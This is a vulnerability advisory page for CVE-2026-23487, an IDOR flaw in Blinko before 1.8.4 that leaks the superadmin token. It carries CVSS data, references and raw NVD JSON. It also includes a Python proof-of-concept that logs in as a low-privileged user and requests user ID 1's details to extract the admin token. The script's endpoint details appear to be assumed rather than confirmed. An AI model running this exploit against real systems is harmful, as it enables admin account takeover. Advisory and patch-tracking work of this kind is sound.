CVE-2026-23487

Description

Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, there is an IDOR vulnerability where user.detail Endpoint Leaks the Superadmin Token. This issue has been patched in version 1.8.4.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:* - VULNERABLE

Blinko < 1.8.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://localhost:3000"
login_endpoint = f"{target_url}/api/user/login"
vulnerable_endpoint = f"{target_url}/api/user/detail"

# Attacker's low-privileged credentials
attacker_credentials = {
    "username": "lowpriv_user",
    "password": "password123"
}

# 1. Login as low-privileged user
session = requests.Session()
login_resp = session.post(login_endpoint, json=attacker_credentials)

if login_resp.status_code == 200:
    print("[+] Login successful")
    
    # 2. Exploit IDOR to get Superadmin Token
    # Assuming ID 1 is the Superadmin (common default)
    params = {"id": 1} 
    
    exploit_resp = session.get(vulnerable_endpoint, params=params)
    
    if exploit_resp.status_code == 200:
        data = exploit_resp.json()
        # Check if token is present in the response
        if "token" in data:
            print(f"[+] Exploit Successful! Superadmin Token: {data['token']}")
        else:
            print("[-] Token not found in response. Response data:")
            print(data)
    else:
        print(f"[-] Exploit request failed with status: {exploit_resp.status_code}")
else:
    print("[-] Login failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23487
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23487
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23487/
[4] VulDB https://vuldb.com/cve/CVE-2026-23487
[5] https://github.com/blinkospace/blinko/commit/bef6b770743e87c630db2d00d7049dabd96bfe85
[6] https://github.com/blinkospace/blinko/releases/tag/1.8.4
[7] https://github.com/blinkospace/blinko/security/advisories/GHSA-4ffv-78qx-9p66

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23487", "sourceIdentifier": "[email protected]", "published": "2026-03-23T21:17:03.127", "lastModified": "2026-03-24T18:04:33.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, there is an IDOR vulnerability where user.detail Endpoint Leaks the Superadmin Token. This issue has been patched in version 1.8.4."}, {"lang": "es", "value": "Blinko es un proyecto de toma de notas en tarjetas impulsado por IA. Antes de la versión 1.8.4, existe una vulnerabilidad IDOR donde el endpoint user.detail filtra el token de superadministrador. Este problema ha sido parcheado en la versión 1.8.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.4", "matchCriteriaId": "31941A3D-C688-40DF-AA55-1AF9056275D0"}]}]}], "references": [{"url": "https://github.com/blinkospace/blinko/commit/bef6b770743e87c630db2d00d7049dabd96bfe85", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/blinkospace/blinko/releases/tag/1.8.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/blinkospace/blinko/security/advisories/GHSA-4ffv-78qx-9p66", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}